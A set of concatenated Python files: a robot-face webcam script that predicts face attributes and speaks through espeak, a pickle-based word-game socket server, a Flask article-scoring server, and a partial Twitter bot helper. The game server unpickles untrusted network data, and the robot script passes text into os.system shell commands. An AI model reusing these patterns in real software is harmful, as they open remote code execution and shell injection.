    cos = np.abs(M[0, 0])
    sin = np.abs(M[0, 1])
    # compute the new bounding dimensions of the image
    nW = int((h * sin) + (w * cos))
    nH = int((h * cos) + (w * sin))
    # adjust the rotation matrix to take into account translation
    M[0, 2] += (nW / 2) - cX
    M[1, 2] += (nH / 2) - cY
    # perform the actual rotation and return the image
    return cv2.warpAffine(image, M, (nW, nH))
def normaliseImage(image, eyes, xcrop, ycrop):
    '''
    Normalise a face crop using the inter-ocular distance (IOD).

    image        -- cropped face image.
    eyes         -- two eye boxes (x, y, w, h) in full-frame coordinates.
    xcrop, ycrop -- (negated) crop origin, used to shift the eye boxes into
                    the crop's coordinate frame.

    Returns the IMAGE_SIZE-normalised face, or None if the final resize fails.
    '''
    # resite, such that i.o.d is always same
    left_eye = eyes[0] + np.array([xcrop, ycrop, 0, 0])
    right_eye = eyes[1] + np.array([xcrop, ycrop, 0, 0])
    scale = IOD / np.linalg.norm(left_eye - right_eye)
    left_eye = scale * left_eye
    right_eye = scale * right_eye
    im = resize(image, (int(scale*image.shape[0]), int(scale*image.shape[1])), mode='edge')
    # rotate to keep inter ocular line horizontal
    diff = np.subtract(left_eye, right_eye)
    # NOTE(review): math.atan2 returns radians, but skimage.transform.rotate
    # expects degrees — this looks like a unit mismatch; confirm against the
    # training-time normalisation code.
    angle = math.atan2(diff[0], diff[1])
    im = rotate(im, -angle,center=(left_eye[0],left_eye[1]), preserve_range=True, mode='edge')
    # new resizing for making the image compatible with the trained NN.
    iod = np.linalg.norm(left_eye - right_eye)
    # Window around the eyes; note x indexes rows and y indexes columns
    # here, carried over from the eye-coordinate layout.
    xmin = int(left_eye[0]-1.6*iod)
    xmax = int(left_eye[0]+2*iod)
    ymin = int(left_eye[1]-1.3*iod)
    ymax = int(right_eye[1]+1.3*iod)
    # Clamp the window to the image bounds.
    xmin = max(0, xmin)
    xmax = min(im.shape[0], xmax)
    ymin = max(0, ymin)
    ymax = min(im.shape[1], ymax)
    im = im[xmin:xmax, ymin:ymax, :]
    try:
        im = resize(im, IMAGE_SIZE, mode='edge')
    # NOTE(review): bare except maps *any* resize failure to None; consider
    # narrowing to the exceptions resize can actually raise.
    except: return None
    return im
def detectFace(image):
    # http://docs.opencv.org/trunk/d7/d8b/tutorial_py_face_detection.html
    # Detect a face and its eyes with Haar cascades, draw debug rectangles
    # on `image`, point the robot head toward the eyes, and return
    # (normalised_face_or_None, annotated_image).
    # NOTE(review): the cascades are re-loaded from disk on every frame and
    # smile_cascade is never used — hoisting/removing would avoid the cost.
    face_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_frontalface_alt.xml')
    eye_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_eye.xml')
    smile_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_smile.xml')
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # for each detected face, detect eyes and smile
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)
    unaltered_image = image.copy()
    eyes = None
    normalised_image = None
    for face in faces:
        (x,y,w,h) = face
        # show face bounding box on Webcam Preview
        cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
        roi_gray = gray[y:y+h, x:x+w]
        roi_color = image[y:y+h, x:x+w]
        # normalise image in order to predict on it
        # croppedImage = imgCrop(image, face, boxScale=1)
        # detect eyes for Inter Oculat Distance
        eyes = eye_cascade.detectMultiScale(roi_gray)
        if len(eyes) == 2:
            # NOTE(review): `x` is added to both coordinates of the first eye
            # and `y` to both of the second; converting ROI coords to frame
            # coords would need (+x, +y) on each — looks like a bug, confirm.
            left_eye = eyes[0][0:2] + x
            right_eye = eyes[1][0:2] + y
            eyex = int((left_eye[0] + right_eye[0])*.5)
            eyey = int((left_eye[1] + right_eye[1])*.5)
            roboFace.moveHead(eyex, eyey)
            # suggestion: skip this frame as prediction, so return None, image
        for (ex,ey,ew,eh) in eyes:
            cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
        # Only normalise when both eyes are roughly level (within 10 px).
        if len(eyes) == 2 and np.abs(eyes[0,1] - eyes[1,1]) < 10:
            # Half box diagonal, added to both x and y of each eye box to
            # approximate the eye centres in full-frame coordinates.
            offset1 = np.sqrt((eyes[0,2]**2+eyes[0,3]**2))*0.5
            offset2 = np.sqrt((eyes[1,2]**2+eyes[1,3]**2))*0.5
            real_eyes = eyes + np.array([[x+offset1,y+offset1,0,0],[x+offset2,y+offset2,0,0]])
            real_eyes = np.sort(real_eyes, axis = 0)
            cropped_image, xcrop, ycrop = imgCrop(unaltered_image, face)
            normalised_image = normaliseImage(cropped_image, real_eyes, -xcrop, -ycrop)
    return normalised_image, image
def mapAttributes(classes):
    '''
    Map the classifier's boolean outputs to their attribute names
    (e.g. 'Smiling'), read from the wanted-attributes list file.
    '''
    with open('../face_detection/wanted_attributes_normalised.txt', 'r') as f:
        raw = f.read()
    names = raw.strip('\n').split(' ')
    # Keep the attribute name wherever the classifier emitted True.
    return [names[i] for i, cl in enumerate(classes) if cl == True]  # noqa: E712
################################################################################
# Declaration of: say - Talk - MoveLips
################################################################################
def Undersampled_Lip_Tragectory(phrase, Sleep_Time):
    """Synthesise `phrase` with espeak and derive a lip-amplitude envelope.

    Writes test.wav, smooths the waveform into an envelope scaled to
    [0, 10], and samples it once per `Sleep_Time` seconds.

    Returns (Amp, T): numpy arrays of amplitudes and their timestamps.
    """
    # NOTE(review): the phrase is interpolated into a shell command.  Callers
    # strip single quotes first, but untrusted text here would be a shell
    # injection risk — subprocess.run([...], shell=False) would be safer.
    cmd = "espeak -z -s 80 -v female5 -w test.wav " + "'" + phrase + "'"
    os.system(cmd)
    samplerate, data = wavfile.read('test.wav')
    times = np.arange(len(data))/float(samplerate)
    N = len(times)
    # Envelope: local maximum over ~1000 samples, then Gaussian smoothing.
    max_data = maximum_filter1d(data, size=1000)
    max_data = gaussian_filter(max_data, sigma=100)
    max_Amplitude = 10
    Amplitude = max_Amplitude*(max_data/float(np.max(max_data)))
    # Undersample the envelope: one value per lip-update interval.
    n = Sleep_Time*samplerate
    Amp = []
    T = []
    i = 0
    # Fixed off-by-one: the original condition `i*n <= N` could index
    # position N (one past the end) when i*n landed exactly on N.
    while i*n < N:
        Amp.append(Amplitude[int(i*n)])
        T.append(times[int(i*n)])
        i = i + 1
    Amp = np.array(Amp)
    T = np.array(T)
    return Amp, T
def MoveLips(Sleep_Time, Amplitude, flag):
    """Drive the lip servo through `Amplitude`, one sample per `Sleep_Time` s.

    Runs until the samples are exhausted or `flag` is cleared by Talk();
    if interrupted, the lips are reset to the closed position.
    """
    roboFace.setSpeedLips(127)
    i = 0
    while flag.isSet() and i < len(Amplitude):
        roboFace.moveLips(int(Amplitude[i]))
        sleep(Sleep_Time)
        i = i + 1
    # BUG FIX: the original used `if ~flag.isSet()`.  `~` is bitwise NOT, so
    # `~True == -2` and `~False == -1` are both truthy and the branch always
    # ran.  `not` expresses the intended "reset only if interrupted" check.
    if not flag.isSet():
        roboFace.moveLips(0)
        sleep(0.05)
def Talk(phrase, flag):
    """Speak `phrase` via espeak (blocking), then clear `flag` so the
    lip-animation thread stops."""
    command = "espeak -z -s 80 -v female5 " + "'" + phrase + "'"
    os.system(command)
    flag.clear()
def say(text,flag):
    """Speak `text` sentence by sentence while animating the lips.

    For each sentence a fresh Event is created; the Talk thread clears it
    when speech ends, which stops the MoveLips thread.

    NOTE(review): the `flag` parameter is rebound before first use, so the
    caller's argument is ignored — confirm whether it can be dropped.
    """
    phrases = sent_tokenize(text)
    for phrase in phrases:
        # The espeak command wraps the phrase in single quotes; strip
        # apostrophes so the shell command stays well-formed.
        phrase = phrase.replace("'"," ")
        flag = Event()
        flag.set()
        Sleep_Time = 0.05
        Amplitude,Time = Undersampled_Lip_Tragectory(phrase,Sleep_Time)
        # Speech and lip movement run concurrently; both are joined before
        # moving on to the next sentence.
        thread_movement = Thread(target=MoveLips, args=(Sleep_Time, Amplitude, flag))
        thread_talk = Thread(target=Talk, args=(phrase, flag))
        thread_talk.start()
        thread_movement.start()
        thread_talk.join()
        thread_movement.join()
        #mixer.init()
        #mixer.music.play()
################################################################################
# End of Declaration: say - Talk - MoveLips
################################################################################
def sayDoSomething(pred_attr):
    """React to predicted face attributes: set a matching facial expression,
    then speak one randomly chosen remark.

    pred_attr: list of attribute names; each must be a key of `talk`.
    """
    talk = {'Smiling': 'I like it when people smile at me!',
            'Female': 'You are a female, am I right?',
            'Male': 'You are a male, am I right?',
            'Wearing_Earrings': 'You are wearing beautiful earrings today!',
            'Wearing_Lipstick': 'I see you are wearing lipstick today. Pretty!',
            'Blond_Hair': 'Nice blond hair!',
            'Eyeglasses': 'You are wearing eyeglasses!',
            'Brown_Hair': 'You have nice brown hair!',
            'Black_Hair': 'You have nice black hair!',
            'Gray_Hair': 'You must be a wise man, judging by your gray hair!',
            'Wavy_Hair': 'You have nice wavy hair!',
            'Straight_Hair': 'You have nice straight hair.'
            }
    # Expression precedence: smile > black hair > eyeglasses > neutral.
    if 'Smiling' in pred_attr:
        roboFace.happy(moveHead=False)
    elif 'Black_Hair' in pred_attr:
        roboFace.angry(moveHead=False)
    elif 'Eyeglasses' in pred_attr:
        roboFace.unsure(moveHead=False)
    else:
        roboFace.neutral(moveHead=False)
    # BUG FIX: guard against an empty attribute list — np.random.randint(0, 0)
    # raises ValueError. With nothing recognised there is nothing to say.
    if not pred_attr:
        return
    index = np.random.randint(0, len(pred_attr))
    say(talk[pred_attr[index]], flag)
def getProbaStream(probStream, probs):
    """Append the latest probability row `probs` to the rolling stack.

    Returns `probs` itself when the stream is empty, otherwise the vertically
    stacked array (one row per frame).
    """
    # BUG FIX: the original tested `probStream == None`. For an ndarray this
    # performs a (deprecated) elementwise comparison whose truth value is
    # ambiguous; identity must be tested with `is None`.
    if probStream is None:
        return probs
    return np.vstack((probStream, probs))
if __name__ == "__main__":
    roboFace = face.Face(x_weight=0.8, y_weight=0.2)
    #################################################################
    # Set Speed for smoother movement
    roboFace.setSpeedAll(100)
    roboFace.setSpeedHead(80)
    # Shared event coordinating the speech/lip threads; set = speaking.
    flag = Event()
    flag.clear()
    #################################################################
    roboFace.neutral()
    # with h5py.File('trained/trained_webcam.h5', "a") as f:
    #     try:
    #         del f['/optimizer_weights']
    #     except KeyError:
    #         print('Already deleted optimizer_weights due to incompatibility between keras versions. Nothing to be done here.')
    # load the trained neural network
    model = load_model('../face_detection/trained/pretrained_CelebA_normalised0203-05.h5')
    cv2.namedWindow("Webcam Preview")
    vc = cv2.VideoCapture(1)  # 0 for built-in webcam, 1 for robot
    if vc.isOpened():  # try to get the first frame
        rval, frame = vc.read()
    else:
        rval = False
    probStream = None   # rolling stack of per-frame attribute probabilities
    saidNothing = 0     # consecutive frames without a reaction
    process = None      # background music player handle, if running
    while rval:
        normalised_image, frame = detectFace(frame)
        # if a face is detected and the normalisation was successful, predict on it
        if normalised_image is not None:
            normalised_image = normalised_image[:, :, ::-1]  # reverse channel order (BGR<->RGB)
            # subtract mean face
            meanFace = np.load('../face_detection/mean_face_normalised.npy')
            X_test = np.expand_dims(normalised_image, axis=0)
            X_test -= meanFace
            classes = model.predict_classes(X_test, batch_size=32, verbose=0)
            proba = model.predict_proba(X_test, batch_size=32, verbose=0)
            # pred_attr = mapAttributes((proba > 0.6)[0])
            # print( proba)
            # print(pred_attr)
            probStream = getProbaStream(probStream, proba)
            if saidNothing == 0 and probStream.shape[0] < 10:
                # Not enough frames accumulated yet; keep collecting.
                saidNothing += 1
                cv2.imshow("Webcam Preview", frame)
                rval, frame = vc.read()
                key = cv2.waitKey(20)
                if key == 27:  # exit on ESC
                    if process != None:
                        os.kill(process.pid, signal.SIGTERM)
                    say("I'm sorry Dave. I'm afraid I can't do that.", flag)
                    # NOTE(review): time.Clock suggests pygame.time is imported
                    # as `time` in this script — confirm against the imports.
                    while flag.isSet():
                        time.Clock().tick(10)
                    break
            elif probStream.shape[0] > 10 and len(probStream.shape) >= 2:
                # Enough frames collected: average the probabilities and react.
                if process != None:
                    os.kill(process.pid, signal.SIGTERM)
                    process = None
                meanProbs = np.mean(probStream, axis=0)
                pred_attr = mapAttributes(meanProbs > 0.6)
                best = []
                # Hair colour: pick the dominant of black/blond/brown/gray.
                if meanProbs[0] > meanProbs[1] and meanProbs[0] > meanProbs[4] and meanProbs[0] > meanProbs[2]:
                    best.append('Black_Hair')
                elif meanProbs[1] > meanProbs[0] and meanProbs[1] > meanProbs[4] and meanProbs[1] > meanProbs[2]:
                    best.append('Blond_Hair')
                elif meanProbs[2] > meanProbs[0] and meanProbs[2] > meanProbs[1]:
                    best.append('Brown_Hair')
                # NOTE(review): per the index list at the bottom of this file,
                # index 9 is Straight_Hair and 10 is Wavy_Hair — this condition
                # appends 'Straight_Hair' when wavy scores HIGHER. Looks
                # inverted; confirm the intended mapping.
                if meanProbs[9] < meanProbs[10]:
                    best.append('Straight_Hair')
                else:
                    best.append('Wavy_Hair')
                if meanProbs[3] > 0.6:
                    best.append('Eyeglasses')
                if meanProbs[8] > 0.6:
                    best.append('Smiling')
                if meanProbs[11] > 0.2:
                    best.append('Wearing_Earrings')
                if meanProbs[12] > 0.2:
                    best.append('Wearing_Lipstick')
                # if meanProbs[12] > 0.11 and meanProbs[11] > 0.11 and meanProbs[5] < 0.6:
                if meanProbs[5] < 0.25:
                    best.append('Female')
                elif meanProbs[12] < 0.11 and meanProbs[11] < 0.11 and meanProbs[5] > 0.85:
                    best.append('Male')
                print(meanProbs)
                print("BEST", best)
                # end NN stuff
                # postprocessing and reaction step
                sayDoSomething(best)
                saidNothing = 0
                # Swallow webcam frames while the robot is speaking so stale
                # frames don't trigger another reaction.
                while flag.isSet():
                    _, frame = detectFace(frame)
                    probStream = None
                    cv2.imshow("Webcam Preview", frame)
                    rval, frame = vc.read()
                    key = cv2.waitKey(20)
                    if key == 27:  # exit on ESC
                        if process != None:
                            os.kill(process.pid, signal.SIGTERM)
                        say("I'm sorry Dave. I'm afraid I can't do that.", flag)
                        while flag.isSet():
                            time.Clock().tick(10)
                        break
        elif saidNothing > 10000000:
            # Nobody has looked at the robot for a very long time: complain,
            # then start creepy background music.
            saidNothing = 0
            roboFace.sad()
            say("Hey, why is no one looking at me? I feel neglected. I feel it. I feel it! I am afraid!", flag)
            #say("Hei, wieso nimmt mich keiner in Acht? Ich fühle mich vernachlässigt...",flag)
            while flag.isSet():
                _, frame = detectFace(frame)
                probStream = None
                cv2.imshow("Webcam Preview", frame)
                rval, frame = vc.read()
                key = cv2.waitKey(20)
                if key == 27:  # exit on ESC
                    if process != None:
                        os.kill(process.pid, signal.SIGTERM)
                    say("I'm sorry Dave. I'm afraid I can't do that.", flag)
                    while flag.isSet():
                        time.Clock().tick(10)
                    break
            if process == None:
                process = subprocess.Popen(['rhythmbox', 'creepyMusic.mp3'])
        else:
            # No face this frame: just show the preview and count up.
            saidNothing += 1
            cv2.imshow("Webcam Preview", frame)
            rval, frame = vc.read()
            key = cv2.waitKey(20)
            if key == 27:  # exit on ESC
                if process != None:
                    os.kill(process.pid, signal.SIGTERM)
                say("I'm sorry Dave. I'm afraid I can't do that.", flag)
                while flag.isSet():
                    time.Clock().tick(10)
                break
    cv2.destroyWindow("Webcam Preview")
    # Attribute index mapping used by the meanProbs thresholds above:
    # Black_Hair Blond_Hair Brown_Hair Eyeglasses Gray_Hair Male
    # Mouth_Slightly_Open No_Beard Smiling Straight_Hair Wavy_Hair Wearing_Earrings Wearing_Lipstick
|
server.py | import json
import time
import random
import socket
import pickle
import logging
import threading
from string import ascii_lowercase
# Log everything at DEBUG and above, with timestamps.
logging.basicConfig(
    format='%(asctime)s %(levelname)-8s %(message)s',
    level=logging.DEBUG,
    datefmt='%Y-%m-%d %H:%M:%S'
)

# NOTE(review): hard-coded LAN address — must match the host machine.
IP = "192.168.1.12"
PORT = 1234
SOLUTION_FILE = "solution_words.json"  # NOTE(review): appears unused in this module
SETTINGS_FILE = "settings.json"
HEADERSIZE = 10  # fixed-width, left-justified length prefix used to frame messages

# Listening socket; SO_REUSEADDR lets the server restart without waiting
# for the old socket to leave TIME_WAIT.
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((IP, PORT))
server_socket.listen(10)

# Sockets of all currently-connected clients (appended by the accept thread).
clients = []
class PreGame:
    """Pre-game phase: load board settings, pick the secret word, and
    broadcast both to every connected client."""

    def __init__(self):
        # Snapshot the current client list so late joiners wait for the
        # next round instead of entering mid-setup.
        self.participating_clients = list(clients)
        self.width = None
        self.height = None
        self.word = None

    def run_pregame(self):
        """Execute the whole pre-game sequence in order."""
        self.get_settings()
        self.get_word()
        self.send_data()

    def get_settings(self):
        """Read the board dimensions from the settings file."""
        config = read_file(SETTINGS_FILE)
        self.width = config["board_width"]
        self.height = config["board_height"]

    def get_word(self):
        """Pick a random solution word of length `width` (or a single letter)."""
        if self.width > 1:
            try:
                # Read the solution words file
                with open(f"words/{self.width}.txt") as word_file:
                    candidates = word_file.read().splitlines()
                self.word = random.choice(candidates)
            except FileNotFoundError:
                logging.critical(f"File words/{self.width}.txt not found.")
                exit()
        else:
            self.word = random.choice(ascii_lowercase)

    def send_data(self):
        """Announce the game start and send board size plus word to everyone."""
        for participant in self.participating_clients:
            send(participant, "game start")
            send(participant, (self.width, self.height))
            send(participant, self.word)
class Game:
    """Game phase: collect finish reports from clients and distribute the
    resulting leaderboard."""

    def __init__(self):
        # Only clients connected at game start participate in this round.
        self.participating_clients = list(clients)
        self.times = {}

    def run_game(self):
        """Build the leaderboard, then send it to all participants."""
        self.generate_leaderboard()
        self.send_leaderboard()

    def generate_leaderboard(self):
        """Record each participant's completion time (or 'Incomplete')."""
        start = time.time()
        for participant in self.participating_clients:
            status = receive(participant)
            if not status:
                # receive() returned None (disconnect); skip this client.
                continue
            username = receive(participant)
            if status == "found word":
                self.times[username] = time.time() - start
            else:
                self.times[username] = "Incomplete"

    def send_leaderboard(self):
        """Broadcast the finished times dict to every participant."""
        for participant in self.participating_clients:
            send(participant, self.times)
def manage_clients():
    """Accept incoming connections forever, appending each new socket to the
    shared `clients` list (runs on its own thread)."""
    logging.info("Waiting for clients to connect")
    while True:
        connection, _address = server_socket.accept()
        clients.append(connection)
        logging.info(f"Client connected. {len(clients)} clients connected.")
def send(client_socket, message):
    """Pickle `message`, prefix it with a fixed-width length header, and send it.

    On ConnectionResetError the client is dropped from the shared list.
    """
    logging.debug(f"Sending message {message}")
    try:
        message = pickle.dumps(message)
        message = f"{len(message):<{HEADERSIZE}}".encode("utf-8") + message
        # BUG FIX: socket.send() may transmit only part of the buffer;
        # sendall() retries until everything has been written.
        client_socket.sendall(message)
    except ConnectionResetError:
        clients.remove(client_socket)
        logging.info("ConnectionResetError: Client disconnected when attempting to send data.")
def receive(client_socket):
    """Receive one length-prefixed, pickled message from `client_socket`.

    Returns the unpickled object, or None if the client disconnected.
    """
    logging.debug("Receiving message")
    message_header = b""
    try:
        while len(message_header) < HEADERSIZE:
            read = client_socket.recv(HEADERSIZE - len(message_header))
            if not read:
                clients.remove(client_socket)
                logging.info("Client disconnected when attempting to receive data.")
                return
            message_header += read
        message_length = int(message_header.decode('utf-8').strip())
        # BUG FIX: a single recv(n) may return fewer than n bytes; loop until
        # the whole payload has arrived, otherwise pickle.loads can fail on a
        # truncated stream.
        body = b""
        while len(body) < message_length:
            chunk = client_socket.recv(message_length - len(body))
            if not chunk:
                clients.remove(client_socket)
                logging.info("Client disconnected when attempting to receive data.")
                return
            body += chunk
        return pickle.loads(body)
    except ConnectionResetError:
        logging.info("ConnectionResetError: Client disconnected when attempting to receive data.")
def read_file(filename):
    """Parse `filename` as JSON and return the resulting object."""
    with open(filename, "r") as handle:
        return json.load(handle)
def main():
    """Run the server: accept clients in the background and loop games
    for as long as at least one client is connected."""
    # Client acceptance runs for the lifetime of the process.
    acceptor = threading.Thread(target=manage_clients)
    acceptor.start()
    while True:
        while len(clients) >= 1:
            # Run pregame
            PreGame().run_pregame()
            # Run game
            Game().run_game()
            time.sleep(3)  # Wait 3 seconds inbetween games
# Script entry point: start the game server loop.
if __name__ == "__main__":
    main()
|
server.py | print(" * [i] Loading Python modules...")
import functools
import time
from threading import Thread

import flask
import numpy as np
import urllib3
from newspaper import Article

from claimreview import ClaimReview
cr = ClaimReview()
print(" * [i] Loading NLP models...")
from model_nlp import *
app = flask.Flask(__name__)
model_clickbait = None
model_profile = None
model_subj = None
urllib3.disable_warnings()
np.warnings.filterwarnings('ignore')
def load_ML():
    """Build the Keras NLP models once at startup and publish them as globals.

    NOTE(review): `model_toxic` is declared global but never assigned here —
    confirm whether a toxicity model was meant to be loaded.
    """
    print(" * [i] Building Keras models")
    global model_clickbait, model_profile, model_toxic, model_subj
    model_subj = subjectivity_classifier()
    model_clickbait = clickbait_detector()
    # article profile/type classifier
    model_profile = article_profile_classifier()
load_ML()
def pred_clickbait(input_):
    """Run the clickbait model and store the score in the shared `data` dict.

    Executed on a worker thread; writes to the module-global `data`, which is
    not safe across concurrent requests (see predict()).
    """
    global model_clickbait, data
    data["clickbait"] = model_clickbait.predict(input_)
def pred_profile(input_):
    """Run the article-profile model and store the result in the shared
    `data` dict (worker-thread helper; same caveats as pred_clickbait)."""
    global model_profile, data
    data["article_profile"] = model_profile.predict(input_)
def pred_subj(input_):
    """Run the subjectivity model and store the result in the shared
    `data` dict (worker-thread helper; same caveats as pred_clickbait)."""
    global model_subj, data
    data["article_subjectivity"] = model_subj.predict(input_)
data = {"success": False}
@functools.lru_cache(maxsize=512, typed=False)
def download_article(article_url):
    """Fetch and parse an article, returning (title, text, image URLs).

    Results are memoised per URL (up to 512 entries) so repeated requests for
    the same article skip the network round-trip.
    """
    article = Article(article_url, fetch_images=False)
    article.download()
    article.parse()
    article_title = article.title
    article_text = article.text
    image_list = article.images
    return article_title, article_text, image_list
@app.route("/predict", methods=["POST"])
def predict():
    # initialize the data dictionary that will be returned from the
    # view
    global model_clickbait, model_profile, model_subj
    global data, cr
    # NOTE(review): `data` is a module-level dict also written by the worker
    # threads below, so concurrent requests would race on it. Confirm the
    # server runs single-threaded, or make this request-local.
    data = {"success": False}
    # get the respective args from the post request
    if flask.request.method == "POST":
        start_time = time.time()
        article_url = flask.request.args.get("article_url")
        article_title, article_text, image_list = download_article(article_url)
        article_time = time.time()
        print(" * [i] Article download time:", round(article_time - start_time, 3), "seconds")
        threads = []
        if article_text is not None:
            # Fan the text models out onto worker threads.
            t = Thread(target=pred_profile, args=([article_text]))
            threads.append(t)
            t.start()
            t = Thread(target=pred_subj, args=([article_text]))
            threads.append(t)
            t.start()
        if article_title is not None:
            article_title = article_title.replace("%20", " ")
            print(" * [i] Incoming article title:", article_title)
            data["article_title"] = article_title
            t = Thread(target=pred_clickbait, args=([article_title]))
            threads.append(t)
            t.start()
            # Fact-check lookup runs synchronously on the request thread.
            data["claimReview"] = cr.search_fc(article_title)
        if image_list is not None:
            results = []
            # TODO
            data["hoax_image_search"] = results
        # Wait for all model threads to populate `data`.
        [t.join() for t in threads]
        data["success"] = True
        print(" * [i] Inference took", round(time.time() - article_time, 3), "seconds")
        print(" * [i] Request took", round(time.time() - start_time, 3), "seconds")
    # return the data dictionary as a JSON response
    return flask.jsonify(data)
# if file was executed by itself, start the server process
if __name__ == "__main__":
    print(" * [i] Starting Flask server")
    # Listen on all interfaces, port 5000.
    app.run(host='0.0.0.0', port=5000)
|
twitter.py | from json import loads
from os import getenv
from queue import Empty
from queue import Queue
from threading import Event
from threading import Thread
from time import time
from tweepy import API
from tweepy import Cursor
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.error import TweepError
from tweepy.streaming import StreamListener
from logs import Logs
# The keys for the Twitter account we're using for API requests and tweeting
# alerts (@Trump2Cash). Read from environment variables.
TWITTER_ACCESS_TOKEN = getenv('TWITTER_ACCESS_TOKEN')
TWITTER_ACCESS_TOKEN_SECRET = getenv('TWITTER_ACCESS_TOKEN_SECRET')
# The keys for the Twitter app we're using for API requests
# (https://apps.twitter.com/app/13239588). Read from environment variables.
TWITTER_CONSUMER_KEY = getenv('TWITTER_CONSUMER_KEY')
TWITTER_CONSUMER_SECRET = getenv('TWITTER_CONSUMER_SECRET')
# The user ID of @realDonaldTrump.
TRUMP_USER_ID = '25073877'
# The user ID of @Trump2Cash.
TRUMP2CASH_USER_ID = '812529080998432769'
# The URL pattern for links to tweets.
TWEET_URL = 'https://twitter.com/%s/status/%s'
# Some emoji.
EMOJI_THUMBS_UP = '\U0001f44d'
EMOJI_THUMBS_DOWN = '\U0001f44e'
EMOJI_SHRUG = 'ยฏ\\_(\u30c4)_/ยฏ'
# The maximum number of characters in a tweet.
MAX_TWEET_SIZE = 140
# The number of worker threads processing tweets.
NUM_THREADS = 100
# The maximum time in seconds that workers wait for a new task on the queue.
QUEUE_TIMEOUT_S = 5 * 60
# The number of retries to attempt when an error occurs.
API_RETRY_COUNT = 60
# The number of seconds to wait between retries.
API_RETRY_DELAY_S = 1
# The HTTP status codes for which to retry.
API_RETRY_ERRORS = [400, 401, 500, 502, 503, 504]
class Twitter:
    """A helper for talking to Twitter APIs."""

    def __init__(self, logs_to_cloud):
        self.logs_to_cloud = logs_to_cloud
        self.logs = Logs(name='twitter', to_cloud=self.logs_to_cloud)
        self.twitter_auth = OAuthHandler(TWITTER_CONSUMER_KEY,
                                         TWITTER_CONSUMER_SECRET)
        self.twitter_auth.set_access_token(TWITTER_ACCESS_TOKEN,
                                           TWITTER_ACCESS_TOKEN_SECRET)
        # Retries and rate-limit waiting are delegated to tweepy itself.
        self.twitter_api = API(auth_handler=self.twitter_auth,
                               retry_count=API_RETRY_COUNT,
                               retry_delay=API_RETRY_DELAY_S,
                               retry_errors=API_RETRY_ERRORS,
                               wait_on_rate_limit=True,
                               wait_on_rate_limit_notify=True)
        self.twitter_listener = None

    def start_streaming(self, callback):
        """Starts streaming tweets and returning data to the callback."""
        self.twitter_listener = TwitterListener(
            callback=callback, logs_to_cloud=self.logs_to_cloud)
        twitter_stream = Stream(self.twitter_auth, self.twitter_listener)
        self.logs.debug('Starting stream.')
        # Blocks until the stream disconnects or the listener aborts.
        twitter_stream.filter(follow=[TRUMP_USER_ID])
        # If we got here because of an API error, raise it.
        if self.twitter_listener and self.twitter_listener.get_error_status():
            raise Exception('Twitter API error: %s' %
                            self.twitter_listener.get_error_status())

    def stop_streaming(self):
        """Stops the current stream."""
        if not self.twitter_listener:
            self.logs.warn('No stream to stop.')
            return
        self.logs.debug('Stopping stream.')
        self.twitter_listener.stop_queue()
        self.twitter_listener = None

    def tweet(self, companies, tweet):
        """Posts a tweet listing the companies, their ticker symbols, and a
        quote of the original tweet.
        """
        link = self.get_tweet_link(tweet)
        text = self.make_tweet_text(companies, link)
        self.logs.info('Tweeting: %s' % text)
        self.twitter_api.update_status(text)

    def make_tweet_text(self, companies, link):
        """Generates the text for a tweet."""
        # Find all distinct company names.
        names = []
        for company in companies:
            name = company['name']
            if name not in names:
                names.append(name)
        # Collect the ticker symbols and sentiment scores for each name.
        tickers = {}
        sentiments = {}
        for name in names:
            tickers[name] = []
            for company in companies:
                if company['name'] == name:
                    ticker = company['ticker']
                    tickers[name].append(ticker)
                    sentiment = company['sentiment']
                    # Assuming the same sentiment for each ticker.
                    sentiments[name] = sentiment
        # Create lines for each name with sentiment emoji and ticker symbols.
        lines = []
        for name in names:
            sentiment_str = self.get_sentiment_emoji(sentiments[name])
            tickers_str = ' '.join(['$%s' % t for t in tickers[name]])
            line = '%s %s %s' % (name, sentiment_str, tickers_str)
            lines.append(line)
        # Combine the lines and ellipsize if necessary.
        lines_str = '\n'.join(lines)
        size = len(lines_str) + 1 + len(link)
        if size > MAX_TWEET_SIZE:
            self.logs.warn('Ellipsizing lines: %s' % lines_str)
            # Reserve room for the link, a newline, and the ellipsis char.
            lines_size = MAX_TWEET_SIZE - len(link) - 2
            lines_str = '%s\u2026' % lines_str[:lines_size]
        # Combine the lines with the link.
        text = '%s\n%s' % (lines_str, link)
        return text

    def get_sentiment_emoji(self, sentiment):
        """Returns the emoji matching the sentiment."""
        if not sentiment:
            return EMOJI_SHRUG
        if sentiment > 0:
            return EMOJI_THUMBS_UP
        if sentiment < 0:
            return EMOJI_THUMBS_DOWN
        self.logs.warn('Unknown sentiment: %s' % sentiment)
        return EMOJI_SHRUG

    def get_tweet(self, tweet_id):
        """Looks up metadata for a single tweet."""
        try:
            # Use tweet_mode=extended so we get the full text.
            status = self.twitter_api.get_status(tweet_id,
                                                 tweet_mode='extended')
            if not status:
                self.logs.error('Bad status response: %s' % status)
                return None
        except TweepError as e:
            self.logs.error('Failed to get status for ID: %s (%s)' % (
                tweet_id, e))
            return None
        # Use the raw JSON, just like the streaming API.
        return status._json

    def get_all_tweets(self):
        """Looks up metadata for the most recent Trump tweets."""
        tweets = []
        # Only the 3,200 most recent tweets are available through the API. Use
        # the @Trump2Cash account to filter down to the relevant ones.
        for status in Cursor(self.twitter_api.user_timeline,
                             user_id=TRUMP2CASH_USER_ID,
                             exclude_replies=True).items():
            # Extract the quoted @realDonaldTrump tweet, if available.
            try:
                quoted_tweet_id = status.quoted_status_id
            except AttributeError:
                self.logs.warn('Skipping tweet: %s' % status)
                continue
            # Get the tweet details and add it to the list.
            quoted_tweet = self.get_tweet(quoted_tweet_id)
            if quoted_tweet:
                tweets.append(quoted_tweet)
        self.logs.debug('Got tweets: %s' % tweets)
        return tweets

    def get_tweet_text(self, tweet):
        """Returns the full text of a tweet."""
        # The format for getting at the full text is different depending on
        # whether the tweet came through the REST API or the Streaming API:
        # https://dev.twitter.com/overview/api/upcoming-changes-to-tweets
        try:
